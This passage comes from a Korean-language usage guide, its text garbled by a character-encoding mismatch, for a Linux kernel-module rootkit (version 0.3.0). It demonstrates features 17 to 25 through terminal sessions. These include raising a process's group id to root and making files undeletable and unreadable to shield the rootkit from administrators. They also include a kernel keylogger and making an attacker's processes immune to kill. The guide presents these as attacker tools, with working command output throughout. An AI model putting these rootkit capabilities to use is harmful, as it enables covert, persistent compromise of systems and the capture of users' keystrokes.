500. process sgid: 500. process fsgid: 500. Ok, Have a nice day! [root@test LKM]# -- x82(uid=500) »ç¿ëÀÚ·Î ½ÇÇà ÁßÀÎ ÇÁ·Î¼¼½º¸¦ root(uid=0)·Î º¯°æÇÏ´Â °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù. {17}: process gid alteration mode. ƯÁ¤ ÇÁ·Î¼¼½ºÀÇ gid¸¦ º¯°æÇÏ´Â ±â´ÉÀÔ´Ï´Ù. ÁöÁ¤ÇÑ ÇÁ·Î¼¼½º ¹øÈ£¸¦ ÅëÇØ gid, egid, sgid, fsgidµîÀ» º¯°æÇÒ ¼ö ÀÖ°Ô ¼³°èµÇ¾ú½À´Ï´Ù. Âü°í·Î, 15¹ø ±â´ÉÀ» ÅëÇØ ÇÁ·Î¼¼½ºÀÇ id Á¤º¸¸¦ È®ÀÎÇÒ ¼ö ÀÖ½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] [ÇÁ·Î¼¼½º(pid) ¹øÈ£] [º¯°æÇÒ gid ¹øÈ£] -- [root@test LKM]# ./mod 15 2427 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, process *id show mode. process id(pid) number: 2427. process name: cat_shadow. process uid: 0. process euid: 0. process suid: 0. process fsuid: 0. process gid: 500. process egid: 500. process sgid: 500. process fsgid: 500. Ok, Have a nice day! [root@test LKM]# ./mod 17 2427 0 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, process gid alteration mode. process id(pid) number: 2427. group id(gid) number: 0. Ok, Have a nice day! [root@test LKM]# ./mod 15 2427 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, process *id show mode. process id(pid) number: 2427. process name: cat_shadow. process uid: 0. process euid: 0. process suid: 0. process fsuid: 0. process gid: 0. process egid: 0. process sgid: 0. process fsgid: 0. Ok, Have a nice day! [root@test LKM]# -- ÇÁ·Î¼¼½º Á¤º¸¸¦ È®ÀÎÇغ» °á°ú, gid°¡ 0À¸·Î º¯°æµÈ °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù. {18}: add ghost file & dir mode. À̹ø ¹öÀüÀÇ rootkit¿¡¼­ »õ·Ó°Ô ¼±º¸ÀÎ ±â´ÉÀ¸·Î½á, Àϸí `°í½ºÆ® ÆÄÀÏ ½Ã½ºÅÛ'À̶ó ºÎ¸¨´Ï´Ù. ghost fileÀ» º¸¾ÈÀûÀÎ Ãø¸é¿¡¼­ º¸¸é, ½Ã½ºÅÛ ÆÄÀϺ¸È£ ±â´É°ú ºñ½ÁÇÏ´Ù°í ÇÒ ¼ö ÀÖ½À´Ï´Ù. ghost file & dir·Î Ãß°¡Çϸé, Ãß°¡µÈ ÆÄÀÏÀº »èÁ¦, ¼öÁ¤ÀÌ ºÒ°¡´ÉÇØÁö¸ç, ÆÄÀÏ Á¤º¸µîÀ» ¾ò¾îº¼ ¼ö ¾ø°Ô µË´Ï´Ù. ÀÌ·¸°Ô µÇ¸é, °ü¸®ÀÚ°¡ ¼û°ÜÁø ÆÄÀÏÀ» ¹ß°ßÇÑ´Ù Çصµ, ¼öÁ¤Çϰųª »èÁ¦ÇÒ ¼ö ¾øÀ¸¹Ç·Î ½Ã½ºÅÛ¿¡ ¼³Ä¡µÈ rootkit¸¦ º¸È£ÇÒ ¼ö ÀÖ½À´Ï´Ù. »ç¿ë¹ýÀº ´ÙÀ½°ú °°½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] [Ãß°¡ÇÒ ÆÄÀÏ À̸§] -- [root@test LKM]# ./mod 18 ps ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, add ghost file & dir mode. add, ps ghost file & dir. Ok, Have a nice day! [root@test LKM]# ls -al /bin/ps ?--------- 0 root root 0 Dec 31 1969 /bin/ps [root@test LKM]# rm -f /bin/ps rm: cannot remove `/bin/ps' [root@test LKM]# mv /bin/ps /tmp/ mv: cannot stat `/bin/ps' [root@test LKM]# cat /bin/ps cat: /bin/ps: Bad file descriptor cat: /bin/ps: Bad file descriptor [root@test LKM]# ps PID TTY TIME CMD 1128 pts/1 00:00:00 login 1155 pts/1 00:00:00 su 1156 pts/1 00:00:01 bash 2805 pts/1 00:00:00 ps [root@test LKM]# chmod 777 /bin/ps chmod: /bin/ps [root@test LKM]# chown nobody: /bin/ps chown: /bin/ps: Function not implemented [root@test LKM]# ls -al /bin/ps ?--------- 0 root root 0 Dec 31 1969 /bin/ps [root@test LKM]# -- À§¿Í °°ÀÌ »èÁ¦, ¼öÁ¤ÀÌ ºÒ°¡´ÉÇϸç, ÆÄÀÏ ¿­¶÷ ¶ÇÇÑ ºÒ°¡´ÉÇÕ´Ï´Ù. À̷νá, ƯÁ¤ ÆÄÀÏÀ» º¸È£ÇÒ ¼ö ÀÖ°Ô µË´Ï´Ù. {19}: del ghost file & dir mode. 18¹ø ±â´É¿¡ ÀÇÇØ ÀÛµ¿ ÁßÀÎ ghost file mode¸¦ ÇØÁ¦ÇÕ´Ï´Ù. »ç¿ë¹ýÀº ´ÙÀ½°ú °°½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] [ÇØÁ¦ÇÒ ÆÄÀÏ À̸§] -- [root@test LKM]# ./mod 19 ps ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, del ghost file & dir mode. del, ps ghost file & dir. Ok, Have a nice day! [root@test LKM]# ls -al /bin/ps -r-xr-xr-x 1 root root 65148 Aug 17 2000 /bin/ps [root@test LKM]# -- º»·¡ÀÇ ps ÆÄÀÏ·Î º¹±¸µÈ °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù. {20}: all del ghost file & dir mode. 18¹ø ±â´É¿¡ ÀÇÇØ Ãß°¡µÈ ¸ðµç ÆÄÀÏ ¹× µð·ºÅ丮¸¦ linked list ¸ñ·Ï¿¡¼­ Á¦°ÅÇÕ´Ï´Ù. »ç¿ë¹ýÀº ´ÙÀ½°ú °°½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] -- [root@test LKM]# ./mod 20 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, all del ghost file & dir mode. all del, ghost file & dir. Ok, Have a nice day! [root@test LKM]# -- {21}: On Key logging mode. Ä¿³Î ±â¹ÝÀÇ Å°·Î±× ±â´ÉÀÔ´Ï´Ù. ÀÌ ±â´ÉÀ» ÅëÇØ ÁöÁ¤ÇÑ ÆÄÀÏ·Î »ç¿ëÀÚ°¡ ÀÔ·ÂÇÏ´Â ³»¿ëµéÀ» ÀúÀåÇÒ ¼ö ÀÖ½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] [ÀúÀå ÆÄÀÏ °æ·Î] -- [root@test LKM]# ./mod 21 /tmp/key_log ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, On Key logging mode. Keylog file path: /tmp/key_log. Ok, Have a nice day! [root@test LKM]# cat /tmp/key_log [2003/01/19 21:33:06] [pts/0:0] cat /tmp/key_log [root@test LKM]# -- /tmp/key_log ÆÄÀÏ¿¡ ½Ç½Ã°£À¸·Î ³»¿ëÀÌ ÀúÀåµÇ´Â °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù. {22}: Off Key logging mode. 21¹ø ±â´É¿¡ ÀÇÇØ È°¼ºÈ­µÇ¾î ÀÖ´Â Å°·Î±× ±â´ÉÀ» ÇØÁ¦ÇÏ´Â ±â´ÉÀÔ´Ï´Ù. »ç¿ë¹ýÀº ´ÙÀ½°ú °°½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] -- [root@test LKM]# ./mod 22 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, Off Key logging mode. Keylogging, Off. Ok, Have a nice day! [root@test LKM]# -- {23}: add process protaction mode. °ø°ÝÀÚÀÇ ÇÁ·Î¼¼½º´Â °ü¸®ÀÚ¿¡ ÀÇÇØ ¹ß°¢µÉ È®·üÀÌ ÀÖ½À´Ï´Ù. ÀÌ·¸°Ô ¹ß°¢µÈ ÇÁ·Î¼¼½º¸¦ °ü¸®ÀÚ°¡ ÇԺηΠkill ÇÒ ¼ö ¾øµµ·Ï process protaction mode ±â´ÉÀ» Áö¿øÇÕ´Ï´Ù. »ç¿ë¹ýÀº ´ÙÀ½°ú °°½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] [ÇÁ·Î¼¼½º(pid) ¹øÈ£] -- [root@test LKM]# ps PID TTY TIME CMD 3692 pts/0 00:00:00 login 3720 pts/0 00:00:00 su 3721 pts/0 00:00:00 bash 3916 pts/0 00:00:00 ps [root@test LKM]# ./mod 23 3720 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, add process protaction mode. add pid: 3720. Ok, Have a nice day! [root@test LKM]# kill -9 3720 [root@test LKM]# ps | grep 3720 3720 pts/0 00:00:00 su [root@test LKM]# -- ƯÁ¤ ÇÁ·Î¼¼½º¸¦ ÁöÁ¤ÇÑ ÈÄ, killÀ» ¼öÇàÇÑ °á°ú, ÇÁ·Î¼¼½º°¡ Á×Áö ¾Ê´Â °ÍÀ» È®ÀÎÇÒ ¼ö ÀÖ½À´Ï´Ù. {24}: del process protaction mode. 23¹ø ±â´É¿¡ ÀÇÇØ º¸È£¸ðµå°¡ Àû¿ë ÁßÀÎ ÇÁ·Î¼¼½º¸¦ ÇØÁ¦ÇÕ´Ï´Ù. »ç¿ë¹ýÀº ´ÙÀ½°ú °°½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] [ÇÁ·Î¼¼½º(pid) ¹øÈ£] -- [root@test LKM]# ./mod 24 3720 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, del process protaction mode. del pid: 3720. Ok, Have a nice day! [root@test LKM]# kill -9 3720 [test@test LKM]$ -- º¸È£ ÁßÀÎ ÇÁ·Î¼¼½º¸¦ ÇØÁ¦ÇÑ °á°ú, Á×Àº °ÍÀ» È®ÀÎÇÒ ¼ö ÀÖ½À´Ï´Ù. {25}: del all process protaction mode. 23¹ø ±â´É¿¡ ÀÇÇØ º¸È£¸ðµå°¡ Àû¿ë ÁßÀÎ ¸ðµç ÇÁ·Î¼¼½º¸¦ ÇØÁ¦ÇÕ´Ï´Ù. »ç¿ë¹ýÀº ´ÙÀ½°ú °°½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] -- [root@test LKM]# ./mod 25 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, del all process protaction mode. del, all pid. Ok, Have a nice day! [root@test LKM]# -- À̷νá, º¸È£ ÁßÀÎ ¸ðµç ÇÁ·Î¼¼½º°¡ ÇØÁ¦µÇ¾ú½À´Ï´Ù. -- ... ÀÌÈÄ·Î ±â´É °è¼Ó Ãß°¡ Áß ... -- Áö±Ý±îÁö, v0.3.0 ¹öÀü¿¡¼­ ±¸ÇöµÈ ¸ðµç ±â´ÉÀ» ¼³¸íµå·È½À´Ï´Ù. ¾ÕÀ¸·Îµµ Ãß°¡µÉ ±â´ÉÀÌ ¿©·¯°¡Áö ÀÖÀ¸¸ç, ÇØ°áÀÌ °¡Àå ½Ã±ÞÇÑ »çÇ×Àº sys_call_table º¯¼ö º¯°æÀ» Çã¿ëÇÏÁö ¾Ê´Â RedHat 9.0 ÀÌ»óÀÇ ¹öÀü¿¡¼­ »ç¿ëÇÒ ¼ö ÀÖµµ·Ï ¼³°èÇÏ´Â °ÍÀÔ´Ï´Ù. °¨»çÇÕ´Ï´Ù.